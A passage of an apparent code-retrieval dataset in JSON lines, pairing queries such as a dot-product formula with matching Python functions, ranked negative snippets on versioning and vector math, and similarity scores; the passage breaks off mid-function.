no_previous = True\n if not self.ask(\"No previous release found. Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def getReleaseVersion(self, workingTowerName, infixStream):\n towerInfix = iccs_apex.whatInfixIsStream(workingTowerName)\n prefixStream, postfixStream = string.split(workingTowerName, towerInfix)\n releaseVersion, postVersion = string.split(postfixStream, \"wrk\")\n releaseTowerName = infixStream + releaseVersion + \"rel\"\n \n return releaseTowerName", "def get_version(self, params):\n return self.version", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def get_stack_version_before_install(component_name):\n stack_root = Script.get_stack_root()\n component_dir = HADOOP_HOME_DIR_TEMPLATE.format(stack_root, \"current\", component_name)\n stack_selector_name = stack_tools.get_stack_tool_name(stack_tools.STACK_SELECTOR_NAME)\n if os.path.islink(component_dir):\n stack_version = os.path.basename(os.path.dirname(os.readlink(component_dir)))\n match = re.match('[0-9]+.[0-9]+.[0-9]+.[0-9]+-[0-9]+', stack_version)\n if match is None:\n Logger.info('Failed to get extracted version with {0} in method get_stack_version_before_install'.format(stack_selector_name))\n return None # lazy fail\n return stack_version\n else:\n return None", "def postreleaser_before(data):\n\n data['dev_version_template'] = '%(new_version)s.dev'", "def get_ver():\n import subprocess\n\n proc = subprocess.run(\n [\"git\", \"describe\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n if not proc.returncode == 0:\n return\n v = proc.stdout.decode().strip()\n if \"-\" not in v:\n ret = v\n else:\n csum = v[v.rindex(\"-\") + 1 :]\n base = v[: v.rindex(\"-\")]\n count = base[base.rindex(\"-\") + 1 :]\n tag = base[: base.rindex(\"-\")]\n ret = f\"{tag}.post{count}+{csum}\"\n return ret", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def test_finder_only_installs_stable_releases(data: TestData) -> None:\n\n req = install_req_from_line(\"bar\")\n\n # using a local index (that has pre & dev releases)\n finder = make_test_finder(index_urls=[data.index_url(\"pre\")])\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url.endswith(\"bar-1.0.tar.gz\"), found.link.url\n\n # using find-links\n links = [\"https://foo/bar-1.0.tar.gz\", \"https://foo/bar-2.0b1.tar.gz\"]\n\n finder = make_test_finder(links)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-1.0.tar.gz\"\n\n links.reverse()\n\n finder = make_test_finder(links)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-1.0.tar.gz\"", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return about.get_version()", "def version_from_versioneer():\n\n # Attempt to get the version string from the git repository\n try:\n from .versioneer_version import get_versions # pylint: disable=import-outside-toplevel\n version_info = get_versions()\n if version_info['error'] is None:\n return version_info['version']\n return None\n except: # pylint: disable=bare-except\n return None", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_setup_version():\n if os.path.isdir(\".git\"):\n process = subprocess.Popen(COMMAND_DESCRIBE_VERSION, **SUBPROCESS_KWARGS)\n process.wait()\n version = process.communicate()[0].decode(\"utf-8\").strip()\n return re.match(re_version, version).group(1)\n else:\n return \"0.1\"", "def get_version(self):\n article_url = self.env[\"article_url\"]\n title = self.get_html_title(article_url)\n regex = r\"(?:(\\d+)\\.)?(?:(\\d+)\\.)?(\\*|\\d+)\"\n match = re.search(regex, title)\n if match:\n version = match.group(0)\n self.output(\"Version: {version}\".format(version=match.group(0)), 2)\n return version\n else:\n raise ProcessorError(\"Unable to determine version.\")", "def get_release(request):\r\n\r\n release = raven.fetch_git_sha(os.path.dirname(os.path.dirname(__file__)))\r\n return HttpResponse(json.dumps({\"release\": release[:7]}))", "def get_version_comparitor(self, requirement):\n if manage.is_inhouse_package(requirement.project_name):\n if self._prefer_final:\n log.debug(' in-house package, prefer-final')\n return easy_install._final_version\n else:\n log.debug(' in-house package, prefer-dev')\n return self.is_dev_version\n else:\n log.debug(' third-party package, always prefer-final')\n return easy_install._final_version", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def test_higher_version_preferred_even_when_tag_is_on_top_of_the_tree(self):\n try:\n self.prepare(tag_latest_version=True)\n self.assertEquals((1, 3, 0), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def getPreviousBuild():" ]
[ "0.65761906", "0.64690495", "0.64539593", "0.6419955", "0.6369132", "0.6336212", "0.62359613", "0.62115157", "0.61312795", "0.612242", "0.6118793", "0.61041874", "0.6091029", "0.6033105", "0.59679747", "0.59453046", "0.5935324", "0.5899036", "0.58957833", "0.58908105", "0.588986", "0.5887754", "0.58852804", "0.58735377", "0.58613676", "0.5860372", "0.58529496", "0.5849485", "0.5845098", "0.5843697", "0.58230305", "0.5820289", "0.5814695", "0.58060443", "0.580507", "0.57865125", "0.5781339", "0.57723683", "0.57646537", "0.5748745", "0.57272667", "0.57245684", "0.5717995", "0.5716356", "0.5716356", "0.5716356", "0.57144606", "0.5700963", "0.5697977", "0.56908077", "0.5689628", "0.56882364", "0.5687746", "0.56748635", "0.566916", "0.5668753", "0.5663923", "0.5657436", "0.56427395", "0.56384134", "0.5635968", "0.5613581", "0.55834675", "0.5577913", "0.5566563", "0.55600566", "0.55552536", "0.5552548", "0.55496615", "0.5530032", "0.55245227", "0.55181795", "0.5516064", "0.55023676", "0.549576", "0.54921764", "0.5488585", "0.54839194", "0.54835063", "0.5478857", "0.5477313", "0.54742914", "0.5461384", "0.54477334", "0.5442732", "0.5440045", "0.5439412", "0.5437255", "0.5436031", "0.54263794", "0.54222083", "0.5421002", "0.5416864", "0.5414095", "0.5413003", "0.5409355", "0.5407969", "0.53891677", "0.53887737", "0.5384924" ]
0.6867934
0
v_1 w_1 + ... + v_n w_n
def dot(v, w): return sum(v_i * w_i for v_i, w_i in zip(v, w))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vector_add(v, w):\n return [v_i + w_i for v_i, w_i in zip(v,w)]", "def vector_add(v, w):\n return [v_i + w_i for v_i, w_i in zip(v, w)]", "def vector_add(v, w):\n\treturn [v_i + w_i for v_i, w_i in zip(v, w)]", "def add(v: Vector, w: Vector) -> Vector:\n assert len(v) == len(w), 'both vectors must have the same length'\n\n return [v_item + w_item for v_item, w_item in zip(v, w)]", "def dot_product(v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot(v,w):\n return sum(v_i * w_i for v_i,w_i in zip(v,w))", "def dot(self,v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot_product(v,w):\n return v[0] * w[0] + v[1] * w[1]", "def dot(v,w):\r\n return sum(v_i * w_i\r\n for v_i, w_i in zip(v, w))", "def dot(v, w):\n\treturn sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot(v,w):\n return sum(v_i * w_i\n for v_i, w_i in zip(v,w))", "def dot(v, w):\n l = list(zip(v, w))\n return sum(v_i * w_i for v_i, w_i in l)", "def dot(v, w):\n return sum(v_i * w_i\n for v_i, w_i in zip(v, w))", "def project(v, w):\n coefficient = dot(v, w)\n return scalar_multiply(coefficient, w)", "def v(w,s):\n return w", "def add_vectors(v, u):\n return (v[0] + u[0], v[1] + u[1])", "def dot(v,w):\n return sum(v_i * w_i for v_i, w_i in zip(v,w)\n\ndef sum_of_squares(v):\n return dot(v, v)\n\nimport math", "def cg_apply_ws(A, B, w0, w1, w2, w3, pars):\n # We manually loop over one of the legs to lower the memory cost.\n vects = []\n # Generate the vectors to sum over in this manual loop,\n # for non-symmetric tensors:\n if A.qhape is None:\n dim = A.shape[5]\n for j in range(dim):\n vect = type(A).zeros([dim])\n vect[j] = 1.\n vects.append(vect)\n # and for symmetric tensors:\n else:\n qim = A.qhape[5]\n dim = A.shape[5]\n direction = A.dirs[5]\n for i, q in enumerate(qim):\n qdim = dim[i]\n for j in range(qdim):\n vect = type(A).zeros([dim], qhape=[qim], dirs=[-direction],\n charge=-direction*q, invar=True)\n vect[(q,)][j] = 1.\n vects.append(vect)\n # Compute the networks with the middle leg replaced with\n # vect \\otimes vect, and sum them all up.\n result = None\n for vect in vects:\n Ared = ncon((A, vect), ([-1,-2,-3,-4,-5,6], [6]))\n Bred = ncon((B, vect.conjugate()), ([-1,-2,-3,-4,5,-6], [5]))\n term = ncon((Ared, Bred,\n w0, w1, w2, w3),\n ([1,2,11,12,-5], [13,14,3,4,-6],\n [-1,1,13], [-2,2,14], [-3,11,3], [-4,12,4]))\n if result is None:\n result = term\n else:\n result += term\n return result", "def operations(h, w):\r\n A=np.random.random([h,w])\r\n B=np.random.random([h,w])\r\n s=A+B\r\n return A,B,s\r\n raise NotImplementedError", "def init_weight(w):\n shape = w.shape\n if len(shape) == 4:\n i, o, u, v = shape\n k = np.sqrt(6 / (i * u * v + o * u * v))\n w.data.uniform_(-k, k)\n elif len(shape) == 2:\n k = np.sqrt(6 / sum(shape))\n w.data.uniform_(-k, k)\n elif len(shape) == 1:\n w.data.zero_()", "def _func(w):\r\n W = _adj(w)\r\n loss, G_loss = _loss(W)\r\n h, G_h = _h(W)\r\n obj = loss + 0.5 * rho * h * h + alpha * h + lambda1 * w.sum()\r\n G_smooth = G_loss + (rho * h + alpha) * G_h\r\n g_obj = np.concatenate((G_smooth + lambda1, - G_smooth + lambda1), axis=None)\r\n return obj, g_obj", "def _eval(self, v):\n return super(weighted_sum_squares, self)._eval(self.weight * v)", "def weighted_sum(W, X):\n\n if len(W) != len(X):\n print(\"Dimension of weight vector should be same as input vector.\")\n return\n\n else:\n H = 0\n\n for i in range(len(W)):\n H += (W[i] * X[i])\n \n return H", "def nn(x, w):\n return np.dot(x, w)", "def SumM(v:'value', e:'error', w:'weight'=None):\n\n v = np.array(v)\n e = np.array(e)\n\n n = len(v)\n assert len(v) == len(e) \n if w is None:\n w = np.array([1.]*len(v))\n else:\n assert len(w) == len(v)\n w = np.array(w) / e**2\n wt = np.sum(w)\n w2t = np.sum(w**2)\n wti = 1/np.sum(w)\n yw = np.sum(w * v) * wti\n Qw = np.sum(w * (v - yw) ** 2)\n d2 = max(0, (Qw - (n-1)) / (wt - w2t*wti))\n wx = 1 / (e**2 + d2)\n wxti = 1 / np.sum(wx)\n a = np.sum(wx * v) * wxti\n e2 = wxti\n return a, np.sqrt(e2)", "def adj_se3(w, v):\n A = np.zeros((6, 6))\n A[0:3, 0:3] = hat3(w)\n A[4:6, 4:6] = hat3(w)\n A[4:6, 0:3] = hat3(v)\n return A", "def computeW(self):\n E = np.where(self.v > 0, 1, -1)\n # theshold the connections to only -1,1\n binary_weights = np.where(self.c > 0, 1, self.c)\n binary_weights = np.where(binary_weights < 0, -1, binary_weights)\n W = np.sum(binary_weights * np.dot(E.reshape(-1,1), E.reshape(1,-1))) # W = C * E * E\n self.W = W\n if np.sum(binary_weights) != 0:\n self.W = self.W / np.sum(binary_weights) # W / W*\n return self.W", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_dot(v, w):\n return np.dot(v, w)", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v, w)]", "def vector_and(v, w):\n return [v_i and w_i for v_i, w_i in zip(v, w)]", "def RSS(X,Y,w):\n v = Y[:,0]- (np.dot(X,w[1:]) + w[0])\n return np.dot(v,v)", "def apply_weights(self):\n w0_array = np.ones(self.N)*self.w0\n return w0_array + self.X.dot(self.w)", "def apply(self, v):\n u = np.zeros(self.Dimension, dtype=complex)\n for me in self.Elements:\n for index in range(v.Elements.size):\n if index == me.j:\n u[me.i] += me.val * v.Elements[index]\n u = Vector(u) \n return u", "def protrudes((u,v)):\r\n return ((u,v,W), (u,v,S), (u,v-1,W), (u-1,v,S))", "def extforce (u, v):\r\n\r\n for i in range (height):\r\n for j in range (width):\r\n u[i,j], v[i,j] = np.stack((u[i,j], v[i,j])) + dt * extacc\r\n\r\n return u, v", "def add_vectors(u, v): #11.22.5\r\n new_vector = []\r\n \"\"\"Because they have same length so we\r\n should take advantage from this one\"\"\"\r\n for i in range(len(u)):\r\n m = u[i] + v[i] # Get their value of i index at the same time!\r\n new_vector.append(m)\r\n return new_vector", "def _adj(w):\r\n return (w[:d * d] - w[d * d:]).reshape([d, d])", "def project(v, w):\n projection_length = dot(v, w)\n return scalar_multiply(projection_length, w)", "def vector_proj(v, w):\n w_hat = vector_hat(w)\n return vector_dot(v, w_hat) * w_hat", "def compress_weights(W, l):\n\n # numpy doesn't seem to have a fast truncated SVD algorithm...\n # this could be faster\n U, s, V = np.linalg.svd(W, full_matrices=False)\n\n Ul = U[:, :l]\n sl = s[:l]\n Vl = V[:l, :]\n\n L = np.dot(np.diag(sl), Vl)\n return Ul, L", "def distance(v, w):\n\treturn magnitude(vector_subtract(v, w))", "def optimise(w, w_delta):\n return w.assign(w - w_delta)", "def vector_or(v, w):\n return [v_i or w_i for v_i, w_i in zip(v, w)]", "def advect (u, v):\r\n # NOTICE: memory usage might be too high, could optimize\r\n\r\n # Store the values from timestep n\r\n un = u\r\n vn = v\r\n\r\n for i in range (height):\r\n for j in range (width):\r\n oldpos = coord (i,j) - dt * np.stack((u[i,j], v[i,j]))\r\n u[i,j], v[i,j] = interpolate (un, vn, oldpos)\r\n\r\n\r\n # Return values for timestep n+1\r\n return u, v", "def stabilizer_vector(v, g, n):\n vg = v.copy()\n w = v.copy()\n for i in range(1, n):\n vg *= g \n w += vg\n assert v == vg * g\n if (w['B'] == 0).all():\n return None\n return w", "def setParamsFromVector(self, params):\n #starting point of w_ih weights in vectorised params\n w_ih_start_pos = 0\n #end point of w_ih weights in vectorised params\n w_ih_end_pos = self.hiddenLayerSize * self.inputLayerSize\n\n self.w_ih = np.reshape( params[ w_ih_start_pos : w_ih_end_pos ], \\\n ( self.inputLayerSize, self.hiddenLayerSize ) )\n\n #end point of w_ho weights in vectorised params\n w_ho_end_pos = w_ih_end_pos + self.hiddenLayerSize * self.outputLayerSize\n\n self.w_ho = np.reshape( params[ w_ih_end_pos : w_ho_end_pos ], \\\n ( self.hiddenLayerSize, self.outputLayerSize))\n\n #end point of b_h biases in vectorised params\n b_h_end_pos = w_ho_end_pos + self.hiddenLayerSize\n \n self.b_h = params[ w_ho_end_pos : b_h_end_pos ]\n \n #end point of b_o biases in vectorised params\n b_o_end_pos = b_h_end_pos + self.outputLayerSize\n \n self.b_o = params[ b_h_end_pos : b_o_end_pos ]", "def vector_weighted_average(vf, weights):\n weights_sum = weights.sum()\n y_average = (vf[:,:,0] * weights).sum() / weights_sum\n x_average = (vf[:,:,1] * weights).sum() / weights_sum\n return np.array([y_average, x_average])", "def _derW(self, w, x, y, z):\n raise NotImplementedError()", "def wedge_distance(u, v):\n n_it = np.size(u)\n sum = 0\n for i in range(1, n_it):\n for j in range(i):\n sum += np.abs(u[i] * v[j] - u[j] * v[i]) ** 2\n return sum", "def scalar_proj(v, w):\n return vector_dot(v, vector_hat(w))", "def dot(v: Vector, w: Vector) -> float:\n assert len(v) == len(w), \"vectors must be same length\"\n\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def vecvari1(array,W,B=None,sqrt=False,BB=False,BS=False,verbose=False,sizz=1,\r\n KCD=False,mulb=False,mul2=False,v3=0,**kwargs):\r\n \r\n arrs=array.shape\r\n #array=np.expand_dims(array,len(array.shape)//2)\r\n ashp=W.shape\r\n dstp=arrs[0]-1 if not((arrs[0]-1)==0) else 1\r\n if verbose:\r\n print(\"VECVARI1:: B? {},SQRT {}, BB {}, BS {}, SIZZ {}, KCD {}, MULB {}, MUL2 {}\".format(\r\n not(B is None),bool(sqrt),bool(BB),bool(BS),sizz,bool(KCD),bool(mulb),bool(mul2)))\r\n print('arrayshape',arrs)\r\n if verbose==2:\r\n print('Wsample',W[:,:,-1,-1])\r\n else:\r\n print('Wsample',W[:,:,-1,-1])\r\n if not(B is None):\r\n print(\"Bsamp\",B)\r\n print('wshape',ashp)\r\n if B is None:\r\n B=np.zeros((1,1,1,1),dtype=np.float32)#channel\r\n bt=len(B.shape)==2\r\n xi=(-2,-1)#xi=(-1,-2)\r\n x2=(-3,-2,-1)\r\n if len(ashp)==5 :#not all data and all weights == 3d data\r\n xi=(-3,-2,-1)\r\n x2=(-4,-3,-2,-1)\r\n if v3:\r\n if mulb:#probably a bad idea\r\n mul=array+B\r\n else:\r\n mul=array\r\n else:\r\n if mulb:#probably a bad idea\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n mul=(array*W)+B\r\n else:\r\n mul=array*W\r\n size=np.sum(W,axis=xi,keepdims=True)#shape=(outputs, channel)\r\n\r\n if BB :\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n if verbose:\r\n if verbose==2:\r\n print('mulsamp',mul[:,-1,-1,::dstp],'arrsamp',array[-1,-1,:])\r\n else:\r\n print('mulsamp',mul[-1,-1,-1],'arrsamp',array[-1,-1,-1])\r\n print('sizsamp',size)\r\n print('bbb',B.shape)\r\n print(\"size\",size.shape)\r\n if sizz==1:#not a good idea\r\n mean=np.sum((mul),axis=xi,keepdims=True)/size\r\n else:\r\n mean=np.sum((mul),axis=xi,keepdims=True)/np.broadcast_to([ashp[-2]*ashp[-1]],(ashp[1],1,1))\r\n if verbose:\r\n if verbose==2:\r\n print(\"meanshape\",mean.shape)\r\n print(\"meansamp\",mean[:,:,:,::dstp,-1,-1,-1])\r\n else:\r\n print(\"meansamp\",mean[-1,:,:,-1,-1,-1,-1])\r\n print(\"etst\",mean.shape)\r\n if verbose==2:\r\n print(\"ameanshp\",(mul-mean).shape)\r\n print(\"amean\",(mul-mean)[:,:,:,::dstp,-1,-1])\r\n else:\r\n print(\"amean\",(mul-mean)[-1,-1,-1])\r\n if mul2:\r\n if mulb:#probably a bad idea\r\n mul=((array-mean)*W)+B\r\n else:\r\n mul=((array-mean)*W)\r\n i=(np.square(mul))/size\r\n else:\r\n if v3==1:\r\n if BB:\r\n i=(np.square(((array-mean)*W)+B)/size)#B could be included\r\n else:\r\n i=(np.square(((array-mean)*W))/size)#B could be included\r\n if v3==2:#not a good idea\r\n if BB:\r\n i=((np.square(array-mean)*W)+B)/size#B could be included\r\n else:\r\n i=((np.square(array-mean)*W))/size#B could be included\r\n if v3==3:\r\n if BB:\r\n i=((np.square(array-mean)/size)*W)+B#B could be included\r\n else:\r\n i=((np.square(array-mean)/size)*W)#B could be included\r\n else:\r\n if BB:\r\n i=(np.square((mul)-mean)+B)/size\r\n else:\r\n i=(np.square((mul)-mean))/size\r\n if KCD:\r\n out=np.sum(i,axis=xi)\r\n else:\r\n out=np.rollaxis(np.sum(i,axis=x2),-1,1)\r\n if verbose:\r\n print(i.shape)\r\n if verbose==2:\r\n print('ishp',i.shape)\r\n print('isample',i[:,-1,-1,::dstp],i.dtype)\r\n else:\r\n print('isample',i[-1,-1,-1],i.dtype)\r\n if sqrt:\r\n out=np.sqrt(out)\r\n if verbose:\r\n if verbose==2:\r\n print('oushp',out.shape)\r\n print(\"outsample\",out[:,::dstp,-1,-1])\r\n else:\r\n print(\"outsample\",out[-1,-1,-1])\r\n print(\"out\",out.shape,(arrs[0],ashp[0],arrs[1],arrs[2]))\r\n if KCD:\r\n out=np.reshape(out,(arrs[0],ashp[0]*arrs[-3],arrs[1],arrs[2]))\r\n else:\r\n assert out.shape==(arrs[0],ashp[0],arrs[1],arrs[2])\r\n if not(BB)and BS:\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n return(out+B[:,0])\r\n else:\r\n return(out)", "def weight_update(u_ff, u_wc, alpha, beta, w, fan_all):\r\n mult_wc = np.matmul(np.reshape(hard_sigmoid_array(u_wc), (fan_all, 1)),\r\n np.reshape(hard_sigmoid_array(u_wc), (1, fan_all)))\r\n mult_ff = np.matmul(np.reshape(hard_sigmoid_array(u_ff), (fan_all, 1)),\r\n np.reshape(hard_sigmoid_array(u_ff), (1, fan_all)))\r\n delta_w = alpha * (1 / beta) * (mult_wc - mult_ff)\r\n delta_w[np.diag_indices(fan_all)] = 0\r\n w = w + delta_w\r\n return w", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def __call__(self, w):\n l1_term = self.alpha * np.linalg.norm(w, 1)\n l2_term = self.alpha * 0.5 * np.linalg.norm(w, 2)\n\n return self.r * l1_term + (1 - self.r) * l2_term", "def distance(v, w):\n return magnitude_of_vector(vector_subtract(v, w))", "def f(t, x, n, v):\n total = 0\n for i in range(n+1):\n for j in range(n+1):\n for k in range(v):\n total = t[i][j] * x[i][j][k]", "def update_params(self, v_0, h_0, v_k, h_k):\n pos = np.dot(np.transpose(v_0), h_0)\n pos_vb = np.sum(v_0, axis=0)\n pos_hb = np.sum(h_0, axis=0)\n neg = np.dot(np.transpose(v_k), h_k)\n neg_vb = np.sum(v_k, axis=0)\n neg_hb = np.sum(h_k, axis=0)\n self.delta_bias_v = self.momentum*self.delta_bias_v + (self.learning_rate/self.batch_size)*(pos_vb - neg_vb)\n self.bias_v += self.delta_bias_v\n self.delta_bias_h = self.momentum*self.delta_bias_h + (self.learning_rate/self.batch_size)*(pos_hb-neg_hb) \n self.bias_h += self.delta_bias_h\n self.delta_weight_vh = self.momentum*self.delta_weight_vh + self.learning_rate*((pos - neg)/self.batch_size - self.decay*self.weight_vh)\n self.weight_vh += self.delta_weight_vh \n return", "def dot(v: Vector, w: Vector) -> float:\n assert len(v) == len(w), 'vectors must be the same length'\n\n return sum(v_item * w_item for v_item, w_item in zip(v, w))", "def w_update(u, H, gamma, D, C):\n w_next = [proj(H[i].dot(u), gamma[i], D[i], C[i]) for i in range(len(H))]\n return w_next", "def getParamsToVector(self):\n #vectorise and concat weights arrays\n weights = np.concatenate( ( self.w_ih.flatten(), self.w_ho.flatten() ) )\n # concat biases vectors\n biases = np.concatenate( ( self.b_h, self.b_o ) )\n # concat weights and biases into params\n params = np.concatenate( ( weights, biases ) )\n return params", "def feature_energy24(wv):\n return np.sqrt(np.sum(wv[2:22, :, :] ** 2, axis=0)).T", "def _optimize(self, v):\n v0, prob_h_v0, vk, prob_h_vk = self._gibbs_sampling(v)\n W_grad, a_grad, b_grad = self._compute_gradients(v0, prob_h_v0, vk, prob_h_vk)\n para_update = [tf.assign(self.W, tf.add(self.W, self.learning_rate*W_grad)),\n tf.assign(self.a, tf.add(self.a, self.learning_rate*a_grad)),\n tf.assign(self.b, tf.add(self.b, self.learning_rate*b_grad))]\n error = tf.metrics.mean_squared_error(v0, vk)[1]\n return para_update, error", "def squared_distance(v, w):\n\treturn sum_squares(vector_subtract(v, w))", "def sumouter(us,vs,lo=-1.0,hi=1.0,out=None):\n result = zeros((len(us[0]),len(vs[0])))\n for u,v in zip(us,vs):\n result += outer(clip(u,lo,hi),v)\n return result", "def weight_expr(self, t, w_plus, z, value):\n pass", "def quad(v1, v2, v3, v4):\n return [[v3, v2, v1], [v4, v3, v2]]", "def test_numbers_can_substitute_vectors(free_alg, full_balance):\n\n dr = free_alg\n p = dr.names\n\n x = IndexedBase('x')\n y = IndexedBase('y')\n r = p.R\n i, j, k, l = symbols('i j k l')\n v = p.v\n w = Vec('w')\n\n orig = dr.sum((i, r), (j, r), x[i, j] * v[i] * w[j] + y[i, j] * v[i] * v[j])\n\n res = orig.subst(v[k], 0, full_balance=full_balance).simplify()\n assert res == 0\n res = orig.subst(v[i], 1, full_balance=full_balance).simplify()\n assert res == dr.sum((i, r), (j, r), x[j, i] * w[i] + y[i, j])", "def vector_dist(v, w):\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)", "def V_particle_ablation(s_n, g_n, s_others, n_h1=64, n_h2=64):\n concated = tf.concat( [s_n, g_n, s_others], axis=1 )\n with tf.variable_scope(\"stage-2\"):\n h1 = tf.layers.dense(inputs=concated, units=n_h1, activation=tf.nn.relu, use_bias=True, name='V_h1')\n h2 = tf.layers.dense(inputs=h1, units=n_h2, activation=tf.nn.relu, use_bias=True, name='V_h2')\n out = tf.layers.dense(inputs=h2, units=1, activation=None, use_bias=False, name='V_out')\n return out", "def weights(self):\n \n n = self.n\n lambda_ = self.alpha**2 * (n +self.kappa) - n\n \n c = .5 / (n + lambda_)\n Wc = np.full(2*n + 1, c)\n Wm = np.full(2*n + 1, c)\n Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)\n Wm[0] = lambda_ / (n + lambda_)\n \n return Wm, Wc", "def weno_nn(\n self,\n v: types.FlowFieldVal,\n dim: str,\n ) -> Tuple[types.FlowFieldVal, types.FlowFieldVal]:\n delta_neg, delta_pos = self._calculate_weno_nn_delta_layer(v, dim)\n weno_wt_neg, weno_wt_pos = self._calculate_weno_nn_weights(\n delta_neg, delta_pos,\n )\n vr_neg, vr_pos = interpolation._reconstruct_weno_face_values( # pylint: disable=protected-access\n v, self._kernel_op, dim=dim, k=self._k\n )\n v_neg, v_pos = interpolation._interpolate_with_weno_weights( # pylint: disable=protected-access\n v, weno_wt_neg, weno_wt_pos, vr_neg, vr_pos, dim=dim, k=self._k\n )\n return v_neg, v_pos", "def plotWeights(w):\n w = w[:,:,0,:]\n # rescale w to 0.0 - 1.0\n mincode = np.amin(w)\n maxcode = np.amax(w)\n w = (w - mincode) / (maxcode - mincode)\n\n out = np.zeros((15, 15))\n for x in range(0,4):\n for y in range(0,4):\n c = x*4+y\n out[x*4:x*4+3, y*4:y*4+3] = w[:,:,c]\n return out", "def dot(u, v, w, a, b):\n u_1, u_2 = u\n v_1, v_2 = v\n return (w*u_1 + b*u_2)*(w*v_1 + b*v_2) + abs(a)*u_1*v_1", "def expandW(w, n_hidden_units):\n i1 = 784 * n_hidden_units\n i2 = i1 + n_hidden_units\n i3 = i2 + n_hidden_units * 10\n i4 = i3 + 10\n assert i4 == w.size, str(i4) + ' ' + str(w.size)\n W1 = w[0:i1].reshape((n_hidden_units, 784))\n b1 = w[i1:i2]\n W2 = w[i2:i3].reshape((10, n_hidden_units))\n b2 = w[i3:i4]\n return W1, b1, W2, b2", "def constraint_sum(w):\n return sum(w) - 1", "def wsum_rvs(mu: np.ndarray, cov: np.ndarray, w: np.ndarray\n ) -> (np.ndarray, np.ndarray):\n mu1 = mu * w # type: np.ndarray\n ndim = mu1.ndim\n # not using axis=-1, to make it work with DataFrame and Series\n mu1 = mu1.sum(axis=ndim - 1)\n cov1 = (cov * (w[..., None] * w[..., None, :])\n ).sum(axis=ndim).sum(axis=ndim - 1)\n return mu1, cov1", "def _update_w(self, idx):\n self.w = ((self._w - 0.4) * (self._generations - idx)) /\\\n (self._generations + 0.4)", "def _derW(self, w, x, y, z):\n if _isscalar(w):\n w_pos = max(min(self.wSearchFunc(self.w_list, w), self.w_n - 1), 1)\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = 